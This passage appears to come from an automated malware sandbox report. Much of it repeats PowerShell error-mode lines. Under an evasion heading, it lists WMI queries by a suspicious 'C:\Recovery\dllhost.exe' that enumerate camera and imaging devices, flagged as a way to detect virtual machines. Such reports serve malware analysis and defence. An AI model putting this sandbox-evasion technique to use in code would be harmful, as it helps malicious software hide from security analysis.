                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
